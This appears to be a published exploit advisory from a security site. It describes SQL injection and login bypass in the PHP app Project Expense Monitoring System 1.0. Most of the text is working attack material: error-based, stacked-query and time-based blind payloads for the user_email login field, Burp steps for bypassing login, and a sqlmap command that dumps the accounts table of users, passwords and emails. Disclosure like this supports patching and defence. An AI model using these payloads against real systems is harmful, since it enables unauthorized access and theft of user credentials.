Project Expense Monitoring System 1.0 SQL Injection

2021.03.29
Credit: Richard Jones
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Project Expense Monitoring System | SQL Login Bypass (Multiple) # Exploit Author: Richard Jones # Date: 2021-03-28 # Vendor Homepage: https://www.sourcecodester.com/php/14001/project-expense-monitoring-system-project-php-source-code-2020.html # Software Link: https://www.sourcecodester.com/download-code?nid=14001&title=Project+Expense+Monitoring+System+Project+in+PHP+With+Source+Code+ # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 Parameter: user_email (POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: user_email=joken@yahoo.com' AND GTID_SUBSET(CONCAT(0x716a6a6271,(SELECT (ELT(2231=2231,1))),0x71626b7a71),2231)-- zfOO&user_pass=a&btnLogin=Login Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: user_email=joken@yahoo.com';SELECT SLEEP(5)#&user_pass=a&btnLogin=Login Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user_email=joken@yahoo.com' AND (SELECT 2456 FROM (SELECT(SLEEP(5)))Dqoh)-- MoOh&user_pass=a&btnLogin=Login Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) #URL: http://TARGET/pems/login.php Steps: 1) Capture post request in burp. 2) Change post data to ``` user_email=joken@yahoo.com' AND (SELECT 2456 FROM (SELECT(SLEEP(5)))Dqoh)-- MoOh&user_pass=a&btnLogin ``` 3) Logged in. Addition: Use sqlmap on the saved post request (save as sql.txt) ``` sqlmap -r sql.txt --batch -D pemsdb -T tblaccounts ``` Will list applications users,passwords,emails,accounttype


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top